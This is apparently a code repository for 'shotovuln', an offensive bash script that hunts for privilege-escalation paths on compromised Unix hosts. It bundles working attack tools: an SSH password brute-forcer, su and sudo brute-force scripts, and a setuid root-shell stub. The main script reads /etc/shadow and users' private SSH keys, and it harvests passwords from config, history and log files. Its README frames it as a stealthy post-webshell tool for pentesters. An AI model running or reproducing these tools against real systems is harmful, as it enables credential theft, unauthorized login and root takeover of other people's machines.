├── README.md ├── shotovuln.sh └── tools ├── getsshpass-0.8.sh ├── su_brute1.py ├── sudo_brute1.py ├── suid.c └── tools_have_to_be_updated /README.md: -------------------------------------------------------------------------------- 1 | 2 | # shotovuln 3 | 4 | An offensive bash script which tries to find GENERIC privilege escalation or privilege changes vulnerabilities and similar issues on \*Nix systems. The tool will try to focus only on useful information. 5 | 6 | # target audience 7 | 8 | Pentesters which need accurate and useful information for privilege escalation 9 | 10 | the script follow this guidelines 11 | - non interactive shell 12 | - stealth, try not to touch drive except if needed, try to run everything in memory 13 | - do not output useless information, only valid vuln or nothing 14 | - run as low privilege user 15 | - show clear path to root if it exists 16 | - no colors, can be used outside of standard terminals 17 | - user should pipe output to file for better read 18 | - try to document the vuln example in comments (ie CVE-xxx CWE weakness) 19 | - requirement on the compromised box : \*nix OS, bash [+ python , pip: for bruteforce] 20 | 21 | typical usage: you get a webshell on \*nix and you want to elevate 22 | 23 | 24 | # options 25 | 26 | Usage: ./shotovuln.sh [currentpassword] [brute] [network] [nosuidaudit] [pupy] [msf] 27 | 28 | # another audit script for Linux again ? seriously ? 29 | 30 | Yes and no. We will try to be attack oriented. Alternative for this script (lynis, upc, ...) are outputing too much unecessary information or information which need to be cross checked. These step slow down pentesters in their tentative to escalate. The script also focuses on the cause of the vulnerability so it might find new ones. 31 | 32 | -------------------------------------------------------------------------------- /shotovuln.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "SHOTOVULN v0.2 *0* Senseiiii show me the path to R00t *o* " 4 | # insert ASCII art =) 5 | echo "Usage: $0 [currentpassword] [brute] [network] [nosuidaudit] [pupy] [msf]"; 6 | echo "Vulnerabilities found will be output under each [x] test"; 7 | # source : github 444xxk/shotovuln 8 | 9 | # PHILOSOPHY for devs 10 | # - non interactive shell 11 | # - stealth, try not to touch drive except if needed, try to run everything in memory 12 | # - do not output useless information, only valid vuln or nothing 13 | # - run as low privilege user 14 | # - show clear path to root 15 | # - no colors, can be used outside of standard terminals 16 | # - user should pipe output to file for better read 17 | # - try to document the vuln example in comments (ie CVE-xxx CWE weakness) 18 | # requirement on the compromised box : *nix OS, bash [+ python , pip: for brute] 19 | # typical usage: you get a webshell on *nix and you want to elevate 20 | 21 | # TODO code all ideas already present in comments work and finalize it for v3 22 | # TODO need to check if "find" is the best cmd to check permissions 23 | # TODO limit find to maxdepth to avoid long scan time 24 | 25 | echo ""; 26 | echo "### 0. Pre work"; 27 | 28 | brute=false; 29 | network=false; 30 | suid=false; 31 | declare -a passfounds; 32 | 33 | # if root exit test 34 | 35 | # brutefroce network packets or SUID running might be noisy, so these are disabled by default 36 | if [ "$2" == "brute" ] ; then brute=true; echo "[B] brute mode"; else echo "[NB] no bruteforce" ; fi 37 | if [ "$3" == "network" ] ; then network=true; echo "[N] network allowed"; else echo "[NN] network not allowed"; fi 38 | if [ "$4" == "suidaudit" ] ; then suid=true; echo "[S] SUID binaries audit allowed"; else echo "[NS] suid testing not allowed"; fi 39 | # start a pupy RAT session to use pupy post exploit modules 40 | # start a meterptr session to use msf local exploit modules 41 | 42 | 43 | echo "[o] Saving writable folders for everyone, useful for next steps"; 44 | writabledirs=$(find / -maxdepth 5 -type d -perm /o+w ! -path "*mqueue*" 2>/dev/null); 45 | writedir=$(echo "$writabledirs" | head -n1); 46 | echo "[o] Will use as writable dir: $writedir"; 47 | 48 | tooldir="$(pwd)/tools/"; 49 | echo "[o] Tools dir is: $tooldir" 50 | 51 | currentuser=$(id); 52 | currentgroup=$(groups); 53 | echo "[o] Current user and privileges is: $currentuser and groups: $currentgroup"; 54 | 55 | if [ $network == true ]; then 56 | if [ ! -f "$writedir/.wordlist" ]; then 57 | echo "[o] Getting quality short password wordlist from web"; 58 | wget -qO "$writedir/.wordlist" "https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top220-probable.txt"; # copy into own git 59 | fi; 60 | fi; 61 | 62 | 63 | echo "[o] Getting valid users for login"; 64 | validusers=$(grep -v '/false' /etc/passwd | grep -v '/nologin' | cut -d ':' -f1); 65 | 66 | if [ $brute == true ]; then 67 | passwords="$writedir/.wordlist"; 68 | # python and pip needed on the box TODO test here 69 | if ( which python ); then pip install pexpect; pythonandpip=true; fi; 70 | fi; 71 | 72 | 73 | 74 | 75 | 76 | echo ""; 77 | echo "### 1. Auditing feature-like paths to go to other privileges" 78 | echo "[x] Getting SSH permissions"; 79 | if [ -f /etc/ssh/sshd_config ]; then 80 | sshperm=$(grep -niR --color permit /etc/ssh/sshd_config); 81 | fi; 82 | # echo "[debug] : $sshperm"; 83 | 84 | echo "[x] Getting allow users (if any) in SSH config" 85 | if [ -f /etc/ssh/sshd_config ]; then 86 | sshusers=$(grep -niR --color allowusers /etc/ssh/sshd_config);fi; 87 | # echo "[debug]: $sshusers"; 88 | 89 | if [ -f /etc/ssh/sshd_config ]; then 90 | sshport=$(grep Port /etc/ssh/sshd_config | cut -d ' ' -f2); 91 | fi; 92 | 93 | 94 | # sudo and su brute https://www.altsci.com/concepts/sudo-and-su-considered-harmful-sudosu-bruteforce-utility 95 | if [ ! -z "$1" ] ; then 96 | echo " ! Currentuser password provided ! "; 97 | echo "[x] Checking what you can do with sudo with this password, ie. going to root"; # example no CVE feature 98 | # TODO non interactive here 99 | 100 | # TODO idea for sudo: list programs that escalate through NOPASSWD. eg some guys think it's a good idea to nopasswd vim, nano, nmap...etc but in these cases you get root. 101 | 102 | sudo -l; 103 | elif [ $brute == true ]; then 104 | echo " ! No password provided ! " 105 | echo "[x] Bruteforcing the loggedin user password through SUDO with python scripts"; # example CWE weak password 106 | # TODO faster sudo bruteforcer, using python child / pexpect 107 | # python $tooldir/sudo_brute1.py < "$passwords" ; # here use a better script or smaller wordlist 108 | 109 | echo "[x] Brute forcing local users password through SU with python scripts"; # example CWE weak password 110 | # python $tooldir/su_brute1.py < $password; 111 | 112 | 113 | echo "[x] Now bruting valid users on SSH ports using ssh passcript"; # example CWE weak password 114 | # $tooldir/getsshpass-0.8.sh "$passwords"; 115 | # else exit; 116 | 117 | fi; 118 | 119 | 120 | 121 | 122 | 123 | # TODO check if dmesg allows you to privesc 124 | # echo "Do we have access to dmesg and check privesc related information ?" ie can we elevate with dmesg info ? 125 | #dmesg script; 126 | 127 | 128 | 129 | 130 | 131 | echo ""; 132 | echo "### 2. Auditing file and folders permissions for privesc" 133 | 134 | echo "[x] Simply cating /etc/shadow and /etc/shadow derivatives, ie. might be lucky"; #CVE-xxx CWE weak file folder permissions 135 | cat /etc/shadow 2>/dev/null; 136 | cat /etc/shadow.* 2>/dev/null; 137 | find / 2>/dev/null -readable -name '/*shadow*' -exec grep -n ':/' {} +; 138 | 139 | echo "[x] Checking readable default private RSA keys in home folders, ie. wrong RSA key permissions"; #CVE-xxx CWE weak file folder permissions 140 | for user in $validusers; do cat "/home/$user/.ssh/id_rsa" 2>/dev/null; done 141 | # TODO extend filename, remove currentuser key 142 | 143 | echo "[x] Root owned files in non root owned directory, ie. other can replace root owned files or symlink"; #example CVE-2016-1247 nginx package vuln, CWE weak file folder permissions 144 | for x in $(find /var -type f -user root 2>/dev/null -exec dirname {} + | sort -u); do (echo -n "root files in folder $x owned by " && stat -c %U "$x") | grep -v 'root'; done 145 | 146 | echo "[x] Writable directory in default PATH, ie. other can tamper PATH of scripts which run automatically"; #example CVE-xxx 147 | pathstotest=$(echo "$PATH" | tr ':' '\n'); 148 | for path in $pathstotest; do find "$path" 2>/dev/null -type d -perm /o+w -exec ls -alhd {} +; done 149 | 150 | echo "[x] Checking usual temporary folders for passwords or secrets and storing them, i.e. other can use the password to elevate or test password reuse"; # example CVE-xxx CWE info disclosure 151 | find /tmp/ 2>/dev/null -type f -size +0 -exec grep -i 'secret/|password/|' {} +; 152 | find /dev/shm 2>/dev/null -type f -size +0 -exec grep -i 'secret/|password/|' {} +; 153 | # TODO hash find in this content 154 | 155 | echo "[x] Checking crontab script protection, ie. other can write to crontab scripts" #example CVE-xxx 156 | for user in $validusers; do 157 | writablescripts=$(grep --color "$user" /etc/crontab | cut -f4 | cut -d ' ' -f1 | sort -u); 158 | for script in $writablescripts; do find $(which "$script") 2>/dev/null -perm /o+w -exec ls -alh {} +; find "$script" 2>/dev/null -perm /o+w -exec ls -alh {} +; done; 159 | done 160 | 161 | # /dev/mem device permission 162 | echo "[x] Checking /dev/mem device permissions, ie. user can elevate by reading to it, trying to extract useful information"; 163 | find /dev/mem -readable 2>/dev/null -exec ls -alh {} +; 164 | 165 | 166 | # TODO check not hardcoded /home but valid users home 167 | # check github.com/51x/LUI for users script 168 | 169 | 170 | echo ""; 171 | echo "### 3. Auditing SUID/SGID and SUID/SGID operations, without arguments provided"; 172 | ### https://www.pentestpartners.com/blog/exploiting-suid-executables/; 173 | echo "[x] SGID folders writable by others, ie. other can get group rights by writing to it"; #example CVE-xxx 174 | find / -type d -perm /g+s -perm /o+w -exec ls -alhd {} + 2>/dev/null; 175 | #find / -type d -perm /g+s -writable -exec ls -alhd {} + 2>/dev/null; # TODO writable by you but access to other group 176 | echo "[x] SUID folders writable by others, ie. other can get user rights by writing to it"; #example CVE-xxx 177 | find / -type d -perm /u+s -perm /o+w -exec ls -alhd {} + 2>/dev/null; 178 | #find / -type d -perm /u+s -writable -exec ls -alhd {} + 2>/dev/null; 179 | # TODO add not current user test ie ! -user $currentuser ; 180 | if [ $suid == true ] ; then 181 | # TODO be careful not to kill network with SUID 182 | # TODO echo "Test SUID conf files for error based info disclosure" 183 | # TODO code it --conf / -c / grep conf in help 184 | # example ./suidbinary -conf /etc/shadow outputs the user hashes 185 | echo "[x] Generating SUID logs ... you might receive some pop ups and error message since we are starting all SUID binaries."; 186 | mkdir -p "$writedir/.shotologs"; 187 | 188 | find / -perm /4000 2>/dev/null | sort -u > "$writedir/.suidbinaries"; 189 | while read -r suid; do 190 | echo "[debug: started $suid]"; 191 | basename=$(basename "$suid"); 192 | #sleep 6s; 193 | # TODO bugfix here the script stops at the middle of the list 194 | timeout 13s strace "$suid" 2>"$writedir"/.shotologs/"$basename".stracelog 1>/dev/null ; 195 | done < "$writedir/.suidbinaries"; 196 | 197 | # add this generic vuln , SUID root loading from writable dir :/ 198 | # https://www.exploit-db.com/exploits/41907/ 199 | echo "[x] Relative path opening in SUID binaries, ie. other can fool the SUID binary to open arbitrary files." #example CVE-xxx 200 | grep -n 'open("\.' "$writedir"/.shotologs/* --color; 201 | grep -n 'open(' "$writedir"/.shotologs/* | grep -v 'open("/'; 202 | echo "[x] Environment variables used in suid binaries, ie. other can inject into env, untrusted use of env variables." #example CVE-xxx 203 | grep -n --color "getenv(" "$writedir"/.shotologs/*; 204 | echo "[x] Exec used in SUID binaries, ie. other can fool SUID use of PATH, untrusted use of PATH." #example CVE-xxx 205 | grep -n --color 'execve(\.' "$writedir"/.shotologs/*; 206 | 207 | fi; 208 | 209 | 210 | 211 | 212 | echo ""; 213 | echo "### 4. Specific edge cases which enable you to change privilege" 214 | echo "[x] Apache symlink test, ie. allows other to check files and folders of other users using the shared apache account"; #example no CVE but feature 215 | find / 2>/dev/null -name "apache*.conf" -exec grep -n -i 'Options +FollowSymLinks' {} +; 216 | find / 2>/dev/null -name "httpd.conf" -exec grep -n -i 'Options +FollowSymLinks' {} +; 217 | echo "[x] Pythonpath variable issues, ie. if PATH is vulnerable and a python privilege script runs, other can inject into its PATH"; #example CVE-xxx 218 | pythonpath=$(python -c "import sys; print '\n'.join(sys.path);") 219 | for path in $pythonpath; do find "$path" 2>/dev/null -type d -perm /o+w -exec ls -alhd {} +; done 220 | echo "[x] Checking terminals permissions, ie. other can write or read from other user terminals and get their privileges"; #example CVE-xxx 221 | find /dev/pts/ 2>/dev/null -perm /o+r -exec ls -alh {} +; 222 | #find /dev/tty* 2>/dev/null -perm /o+r -exec ls -alh {} +; 223 | # echo "[x] Checking DBUS vulnerabilities [WIP]" ; # example CVE-2017-8422 (KAuth) and CVE-2017-8849 (smb4k) 224 | #TODO use python to check dbus isssues ? 225 | 226 | 227 | echo ""; 228 | echo "### 5. Init.d and RC scripts auditing"; 229 | ### The problem is service (init.d) strips all environment variables but TERM, PATH and LANG which is a good thing 230 | # http://www.yolinux.com/TUTORIALS/LinuxTutorialInitProcess.html 231 | # https://serverfault.com/questions/374404/service-command-and-environment-variables 232 | echo "[x] RC.local scripts pointing to vulnerable directory, ie. other can write to it and get root privilege"; # example CVE-xxx 233 | pathstoaudit=$(grep '^/' /etc/rc.local | cut -d ' ' -f1); # need better regex this suxx 234 | for path in $pathstoaudit; do 235 | find "$path" 2>/dev/null -perm /o+w -exec ls -alh {} +; 236 | find "$path" 2>/dev/null -writable -exec ls -alh {} +; 237 | done; 238 | echo "[x] Check if users can restart services"; 239 | # TODO code it 240 | echo "[x] Init.d scripts using unfiltered environment variables, ie. user can inject into it and get privilege"; #example CVE-xxx 241 | echo "[debug] need better filtering"; # need better filtering 242 | grep -R -v 'PATH=\|LANG=\|TERM=' /etc/init.d/* | grep " PATH\| LANG\| TERM" | grep -v '#' | grep -v 'export'; 243 | # TODO confirm this is exploitable , better regexp , remove commented line 244 | # race PATH inject before init.d is starting 245 | # init.d is starting early 246 | echo "[x] Usage of predictable or fixed files in a writable folder used by init.d, ie. other can race and symlink file creation"; # example CVE-xxx 247 | echo "[debug] need better filtering"; # need better filtering 248 | # TODO list all path used by init, filter writable ones 249 | # TODO better regex 250 | grep -R '/tmp' /etc/init.d/* | grep -v '#'; 251 | 252 | 253 | 254 | 255 | 256 | echo ""; 257 | echo -e "### 6. Configuration files, password disclosure and password reuse"; 258 | echo "[x] Checking readable passwords used in .conf files, ie. other can read and use them or try password reuse"; 259 | conffiles=$(find / -type f -readable 2>/dev/null -name "*.conf" | sort -u); 260 | for file in $conffiles; do 261 | if (grep -i "password =\|password=\|password :\|password:" "$file" | grep -E "^#" -v); then echo " ! Passwords found in $file" ; fi; 262 | done 263 | #find / 2>/dev/null -name "*.conf" -exec grep -n -i "password =\|password=\|password :\|password:" {} +; 264 | # TODO filter false positives, filter comments 265 | echo "[x] Checking writable .conf files, ie current user cannot modify them to achieve privesc" # example CWE 266 | find /etc 2>/dev/null -name "*.conf" -writable; 267 | 268 | 269 | 270 | echo ""; 271 | echo "### 7. Log file information disclosure"; 272 | echo "[x] Checking history files and harvesting info, ie. other can read password and try password reuse"; # example CWE file folder permission 273 | find / 2>/dev/null -name "*history" -exec grep -n -i "password\|pass\|\-p" {} +; 274 | # $validusers history grepping 275 | echo "[x] Checking log files for passwords, ie. other can read and try password reuse"; 276 | find / 2>/dev/null -name "*.log" -exec grep -n -i "password" {} +; 277 | 278 | 279 | 280 | echo ""; 281 | echo "### 8. Database file information disclosure"; 282 | echo "[x] Checking passwords inside local databases file" 283 | sqlitefiles=$(find / 2>/dev/null -name "*.sqlite" -readable); 284 | 285 | 286 | 287 | echo ""; 288 | echo "### X. Privesc matrix"; 289 | # we might need to create a matrix of user privs 290 | echo "[x] Creating a matrix of user privileges possibilities ..." 291 | echo "[debug] sample : $currentuser > user2 > user9 > group1 > root(group) > root"; 292 | # BIG TODO , map the privilege , ie like user1 > user2 > user3 > root 293 | # privescpath=(user1,user2);(user2,root) 294 | -------------------------------------------------------------------------------- /tools/getsshpass-0.8.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # sshpass return values: 4 | # 0 - password OK 5 | # 3 - general runtime error 6 | # 5 - bad password 7 | # 255 - connection refused 8 | 9 | 10 | declare -r START_TIME=$(date +%s.%N) # Start time of the program 11 | 12 | function usage { 13 | echo -e "Usage: $0 [OPTIONS]" 14 | echo "OPTIONS: " 15 | echo -e " -a IP address of SSH server" 16 | echo -e " -d TCP port 1 - 65535 of SSH server" 17 | echo -e " -n slow down or speed up attack for number of seconds" 18 | echo -e " e.g. 1, 0.1, 0.0, default value is 0.1" 19 | echo -e " -p path to file with passwords" 20 | echo -e " -u path to file with usernames" 21 | echo -e " -v display version" 22 | echo -e " -h display help" 23 | } 24 | 25 | function version 26 | { 27 | echo -e "getsshpass.sh 0.8" 28 | echo -e "Copyright (C) 2016 Radovan Brezula 'brezular'" 29 | echo -e "License GPLv3+: GNU GPL version 3 or later ." 30 | echo -e "This is free software: you are free to change and redistribute it." 31 | echo -e "There is NO WARRANTY, to the extent permitted by law." 32 | exit 33 | } 34 | 35 | function read_args { 36 | while getopts "a:d:n:p:u:hv" arg; do 37 | case "$arg" in 38 | a) ip="$OPTARG";; 39 | d) port="$OPTARG";; 40 | n) nval="$OPTARG";; 41 | p) passlist="$OPTARG" 42 | initpasslist="$passlist";; 43 | u) userlist="$OPTARG" 44 | inituserlist="$userlist";; 45 | v) version;; 46 | h) usage 47 | exit;; 48 | esac 49 | done 50 | } 51 | 52 | function check_args { 53 | pthdir="$(dirname $0)" 54 | 55 | if [ -f "$pthdir/x0x901f22result.txt" ]; then 56 | pass=$(grep -o "d: '.*'" x0x901f22result.txt | cut -d ":" -f2) 57 | echo "File '$pthdir/x0x901f22result.txt' contains saved password:$pass, nothing to do" && exit 58 | fi 59 | 60 | type -P sshpass 1>/dev/null 61 | [ "$?" -ne 0 ] && echo "Utillity 'sshpass' not found, exiting" && exit 62 | 63 | if [ -z "$ip" ]; then 64 | echo "IP address can't be empty, exiting" 65 | usage 66 | exit 67 | else 68 | echo "$ip" | grep -w "^[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}.[0-9]\{1,3\}$" 1>/dev/null 69 | [ "$?" -ne 0 ] && echo "'$ip' is not valid IP address, exiting" && usage && exit 70 | fi 71 | 72 | [ -z "$nval" ] && nval=0.1 # Use default value 0.1s if no -n is entered 73 | 74 | [ -z "$port" ] && echo "TCP port can'be empty, exiting" && usage && exit 75 | if [[ "$port" =~ ^[[:digit:]]+$ ]]; then 76 | if ( [ "$port" -gt 65535 ] || [ "$port" -eq 0 ] ); then 77 | echo "TCP port has to be in range 1 - 65535" 78 | usage 79 | exit 80 | fi 81 | else 82 | echo "TCP port must be digit, exiting" 83 | usage 84 | exit 85 | fi 86 | 87 | [ ! -f "$passlist" ] && echo "Can't find file with list of passwords, exiting" && usage && exit 88 | [ ! -f "$userlist" ] && echo "Can't find file with list of users, exiting" && usage && exit 89 | fullpasslist="$passlist" #Backup original passlist 90 | fulluserlist="$userlist" #Backup oroginal userlist 91 | 92 | # Check SSH connection 93 | echo -n "Checking SSH connection to '$ip': " 94 | sshpass -p admin ssh -o StrictHostKeyChecking=no -o ConnectTimeout=8 -p "$port" admin@"$ip" exit &>/dev/null; rvalssh="$?" 95 | if [ "$rvalssh" == 0 ]; then 96 | echo "*** OK ***" 97 | echo "*** Found username: 'admin' and password: 'admin' ***" > "$pthdir/x0x901f22result.txt" 98 | evaluate_result 99 | elif [ "$rvalssh" == 255 ]; then 100 | echo "*** FAIL ***" 101 | echo "*** Can't establish SSH connection to '$ip', exiting ***" && exit 102 | else 103 | echo "*** OK ***" 104 | fi 105 | 106 | # Read saved username and password from file 01xza01.txt, if file exists read saved credentials from file 107 | if [ -f "$pthdir/01xza01.txt" ]; then 108 | lastuser=$(head -1 "$pthdir/01xza01.txt" | cut -d ":" -f1) 109 | lastpass=$(head -1 "$pthdir/01xza01.txt" | cut -d ":" -f2) 110 | echo "Found file: '$pthdir/01xza01.txt' containig previously saved username: '$lastuser' and password: '$lastpass'" 111 | echo "Restoring attack using username '$lastuser' and password '$lastpass'" 112 | row1user=$(grep -wno "^$lastuser$" "$userlist"); rvaluser="$?" 113 | row1pass=$(grep -wno "^$lastpass$" "$passlist"); rvalpass="$?" 114 | 115 | if [ "$rvaluser" == 0 ]; then 116 | rowuser=$(echo "$row1user" | cut -d ":" -f1) 117 | tail -n +"$rowuser" "$userlist" > "$userlist"\.new 118 | userlist=$(echo "$userlist"\.new) 119 | fi 120 | 121 | if [ "$rvalpass" == 0 ]; then 122 | rowpass=$(echo "$row1pass" | cut -d ":" -f1) 123 | tail -n +"$rowpass" "$passlist" > "$passlist"\.new 124 | passlist=$(echo "$passlist"\.new) 125 | fi 126 | else 127 | [ ! -f "$pthdir/01xza01.txt" ] && echo "Warning: Can't find file containing last used username and password in directory '$pthdir', starting from beginning" 128 | fi 129 | 130 | maxusercount=$(wc -l "$fulluserlist" | cut -d " " -f1) 131 | maxpasscount=$(wc -l "$fullpasslist" | cut -d " " -f1) 132 | maxcount=$(( $maxusercount * $maxpasscount )) 133 | [ ! -f "$pthdir/01xza01.txt" ] && actualcount=1 134 | } 135 | 136 | function parallel_ssh { 137 | echo "$user":"$pass" > "$pthdir/01xza01.txt" 138 | sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -p "$port" "$user"@"$ip" exit &>/dev/null; retval="$?" 139 | [ "$retval" == 0 ] && echo "*** Found username: '$user' and password: '$pass' ***" > "$pthdir/x0x901f22result.txt" 140 | # While loop eliminates 'Connection refused' attempts -> retval=255 and 'General runtime error' -> retval=3 141 | # It happens when parameter 'n' is too small 142 | # retval must be either 0 -> good password or 5 -> bad password 143 | while [ "$retval" == 255 -o "$retval" == 3 ]; do 144 | sshpass -p "$pass" ssh -o StrictHostKeyChecking=no -p "$port" "$user"@"$ip" exit &>/dev/null; retval="$?" 145 | [ "$retval" == 0 ] && echo "*** Found username: '$user' and password: '$pass' ***" > "$pthdir/x0x901f22result.txt" 146 | sleep "$nval" 147 | done 148 | } 149 | 150 | function launch_attack { 151 | while read user; do 152 | while read pass; do 153 | if [ ! -f "$pthdir/x0x901f22result.txt" ]; then 154 | echo "Trying username: '$user' and password: '$pass'" 155 | parallel_ssh &>/dev/null & 156 | else 157 | evaluate_result 158 | fi 159 | sleep $nval 160 | done < "$passlist" 161 | passlist="$fullpasslist" # Always start search with first pass from dictionary when user is changed 162 | done < "$userlist" 163 | evaluate_result 164 | } 165 | 166 | # Show ellapsed time 167 | function ellapsed_time { 168 | END_TIME=$(date +%s.%N) 169 | dt=$(echo "$END_TIME - $START_TIME" | bc) 170 | dd=$(echo "$dt/86400" | bc) 171 | dt2=$(echo "$dt-86400*$dd" | bc) 172 | dh=$(echo "$dt2/3600" | bc) 173 | dt3=$(echo "$dt2-3600*$dh" | bc) 174 | dm=$(echo "$dt3/60" | bc) 175 | ds=$(echo "$dt3-60*$dm" | bc | awk '{printf("%.2f\n", $1)}') 176 | 177 | if [ "$dd" == "0" ] ; then dd=""; else dd=${dd}"d "; fi 178 | if [ "$dh" == "0" ] ; then dh=""; else dh=${dh}"h "; fi 179 | if [ "$dm" == "0" ] ; then dm=""; else dm=${dm}"m "; fi 180 | 181 | echo "Ellapsed time: "${dd}""${dh}""${dm}""${ds}"s" 182 | } 183 | 184 | function evaluate_result { 185 | [ -f "$pthdir/01xza01.txt" ] && rm "$pthdir/01xza01.txt" # We don't need last saved password when script kills itself (password found) or 186 | if [ -f "$pthdir/x0x901f22result.txt" ]; then # Display found username and password when password is found 187 | cat "$pthdir/x0x901f22result.txt" 188 | ellapsed_time 189 | else 190 | echo "*** Password not found, use other dictionary ***" 191 | fi 192 | [ -f "$inituserlist".new ] && rm "$inituserlist".new # delete files $inituserlist.new and $initpasslist.new 193 | [ -f "$initpasslist".new ] && rm "$initpasslist".new # they're created when interrupted guessing is used 194 | pkill sshpass 195 | } 196 | 197 | function monitor_signal { 198 | trap 'pkill sshpass; echo "Program teminated."; exit' SIGHUP SIGTERM SIGQUIT # kill sshpass when script finishes or 199 | trap 'pkill sshpass; echo "Ctrl+C detected, start script again to continue with attack"; exit' SIGINT # it is interrupted / suspended 200 | trap 'pkill sshpass; echo "Ctrl+Z detected, start script again to continue with attack"; exit' SIGTSTP 201 | } 202 | 203 | 204 | ### BODY ### 205 | 206 | read_args $"@" 207 | check_args 208 | monitor_signal 209 | launch_attack 210 | -------------------------------------------------------------------------------- /tools/su_brute1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | su_brute1.py 4 | by Javantea 5 | Aug 10, 2010 6 | 7 | Su Bruteforce Utility version 0.1 8 | Allows an attacker with wheel access to gain root priviledges using a 9 | dictionary or bruteforce attack provided by pipe. 10 | For example: 11 | ./john --stdout --incremental | python su_brute1.py 12 | python su_brute1.py < rockyou1_order.txt 13 | """ 14 | 15 | import pexpect 16 | from sys import stdin 17 | 18 | password_test = '#' 19 | password_found = [] 20 | 21 | while password_test: 22 | # need to multiply child for faster brute 23 | password_test = stdin.readline().strip() 24 | # print "password tested is " + password_test # debug 25 | child = pexpect.spawn('su') 26 | child.expect('Password:') 27 | child.sendline(password_test) 28 | data = child.readline() 29 | data += child.readline() 30 | data += child.readline() 31 | failure = ('su: Authentication failure' in data) 32 | child.close() 33 | # print 'data1:', data # debug 34 | if not failure: 35 | print 'data2:', repr(data) 36 | if 'Permission denied' in data: 37 | print 'You are not in wheel, sorry.' 38 | break 39 | #end if 40 | print "password found:", password_test 41 | break 42 | #end if 43 | #loop 44 | 45 | -------------------------------------------------------------------------------- /tools/sudo_brute1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | sudo_brute1.py 5 | by Javantea 6 | Aug 10, 2010 7 | 8 | Sudo Bruteforce Utility version 0.1 9 | Allows an attacker with wheel access to gain root priviledges using a 10 | dictionary or bruteforce attack provided by pipe. 11 | For example: 12 | ./john --stdout --incremental | python sudo_brute1.py 13 | python sudo_brute1.py < rockyou1_order.txt 14 | """ 15 | 16 | import pexpect 17 | from sys import stdin 18 | 19 | 20 | 21 | password_test3 = '#' 22 | while password_test3: 23 | print "reading from stdin" 24 | password_test1 = stdin.readline().strip() 25 | password_test2 = stdin.readline().strip() 26 | password_test3 = stdin.readline().strip() 27 | print password_test1 28 | print password_test2 29 | print password_test3 30 | child = pexpect.spawn('sudo test') 31 | print child 32 | # patch here 33 | child.expect('Password:') 34 | child.sendline(password_test1) 35 | data = child.readline() 36 | data += child.readline() 37 | failure1 = ('Sorry, try again.' in data) 38 | print 'data0a:', data 39 | child.expect('Password:') 40 | child.sendline(password_test2) 41 | data = child.readline() 42 | data += child.readline() 43 | failure2 = ('Sorry, try again.' in data) 44 | print 'data0b:', data 45 | child.expect('Password:') 46 | child.sendline(password_test3) 47 | data = child.readline() 48 | data += child.readline() 49 | failure3 = ('Sorry, try again.' in data) 50 | child.close() 51 | print 'data1:', data 52 | failure = failure1 and failure2 and failure3 53 | if not failure: 54 | print 'data2:', repr(data) 55 | if 'Permission denied' in data: 56 | print 'You are not in sudoers, sorry.' 57 | break 58 | #end if 59 | print "password found:", password_test1, password_test2, password_test3 60 | break 61 | #end if 62 | #loop 63 | 64 | -------------------------------------------------------------------------------- /tools/suid.c: -------------------------------------------------------------------------------- 1 | int main(void){ 2 | setresuid(0, 0, 0); 3 | system("/bin/sh"); 4 | } 5 | -------------------------------------------------------------------------------- /tools/tools_have_to_be_updated: -------------------------------------------------------------------------------- 1 | yes 2 | --------------------------------------------------------------------------------